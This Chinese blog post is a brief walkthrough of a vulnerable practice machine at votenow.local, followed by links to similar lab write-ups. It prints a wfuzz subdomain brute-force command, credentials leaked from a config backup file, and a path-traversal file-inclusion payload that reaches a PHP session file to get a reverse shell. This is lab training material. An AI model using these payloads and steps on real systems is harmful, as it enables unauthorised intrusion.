pre靶机

最新推荐文章于 2024-10-06 21:18:37 发布
最新推荐文章于 2024-10-06 21:18:37 发布
阅读量114 收藏
点赞数 3
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/140914228
版权

查看靶机mac地址

主机发现

访问ip

目录扫描

端口扫描

获取config.php.bak文件

他的邮箱可能是他的域名

将ip和域名放到hosts文件中

对域名进行目录扫描 还是没有有用的信息

尝试爆破子域名

wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.154.149' -w /home/kali/Desktop/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45

将子域名放到hosts文件

访问子域名

使用之前的config.php.bak账号密码

votebox / casoj3FFASPsbyoRP

进行反弹shell

写入反弹shell语句 vps进行监听

访问 cookie值是文件名

/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_9m1f4b9l84cbomo7krgpk32pfgiutkl1

反弹成功

Clearlove~7
关注
靶机Tempus Fugit wirteup
id_null的博客
10-13 883
0x00 namp扫描 看来只能通过web拿shell了 0x01 分析web 御剑扫描没有任何文件,只能手动检查一下了 看到upload知道大概率是个上传拿shell的套路,继续看 现在猜测还有个FTP的漏洞,但靶机并没有开放21端口,很神秘,去看看upload 一言不合先上马 上传之后的回显提示只能上传txt和rtf,很神秘。开始怀疑这网站...
Ted靶机
zdd1453691081的博客
08-14 532
信息收集: 靶机地址:https://www.vulnhub.com/entry/ted-1,327/ (1)ip扫描 nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:FF:7F:9A' (2)端口扫描 nmap -p- -A 192.168.254.159 (3)目录扫描,没啥发现 dirb http://192.168.254.159 (4)访问页面 (5)进行弱口令登陆,登陆失败,burp抓包进行
vulnhub 网站靶机 DC-1 打靶记录
weixin_43959885的博客
10-31 3024
vulnhub 网站靶机 DC-1 打靶记录 确定IP地址 首先从在虚拟机里面可以得知是实用的桥接模式还是NAT模式,可以确定大致网段 下面进行主机扫描 使用nmap ➜ ~ nmap 192.168.18.0/24 -sn Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:57 CST Nmap scan report for bogon (192.168.18.1) Host is up (0.00044s latency). Nmap
Metasploitable2靶机渗透
耿先生的博客
02-06 4542
*Metasploitable2靶机渗透* *Metasploitable2介绍* ​ Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 *进行此次靶机练习的原因* ​
vulnhub靶机 Os-ByteSec
witwitwiter的博客
08-29 459
vulnhub靶机 Os-ByteSec 靶机地址hackNos: Os-Bytesec ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 靶机网卡配置参考我之前的vulnhub靶机 Os-hackNos-1_witwitwiter的博客-CSDN博客 渗透测试 使用nmap进行端口扫描 └─# nmap -sV 192.168.5.135 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:
HTB靶场系列 Windows靶机 Optimum靶机
m0_57221101的博客
01-28 2544
勘探 依然是nmap扫描 nmap 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST Nmap scan report for 10.10.10.8 Host is up (0.031s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1
vulnhub靶机实战DC-3
Varin
06-04 996
vulnhub靶机实战DC-3
Pikachu靶机通关和源码分析
Aiwin的博客
07-25 4182
Pikachu靶机通关和源码分析
渗透靶机进行提权
weixin_48876267的博客
10-21 485
渗透靶机进行提权 1 获取靶机相关信息 nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/
HTB靶场系列 Windows靶机 Legacy靶机
m0_57221101的博客
01-27 1987
勘探 常规nmap扫描 root@kali# nmap 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST Nmap scan report for 10.10.10.4 Host is up (0.018s latency). Not shown: 65532 filtered ports
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8233
HTB Cerberus hard!!!靶机writeUp
xss.haozi.me靶机
newlife1441的博客
07-28 358
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 635
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
笔记)第三期书生·浦语大模型实战营(十一卷王场)–书生基础岛第5关---XTuner 微调个人小助手认知
最新发布
haidizym的博客
10-06 421
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1tz421B72y/课程文档:关卡作业:https://github.com/InternLM/Tutorial/blob/camp3/docs/L1/XTuner/task.md开发机平台:https://studio.intern-ai.org.cn/
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 934
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 558
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
强化学习笔记之【DDPG算法】
rvdgdsva的博客
10-06 836
强化学习第2篇.强化学习方向的学习者可以参考或者复刻
【韩顺平Java笔记】第6章:数组、排序和查找
随手写写
10-02 833
排序是将多个数据,依指定的顺序进行排列的过程。
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值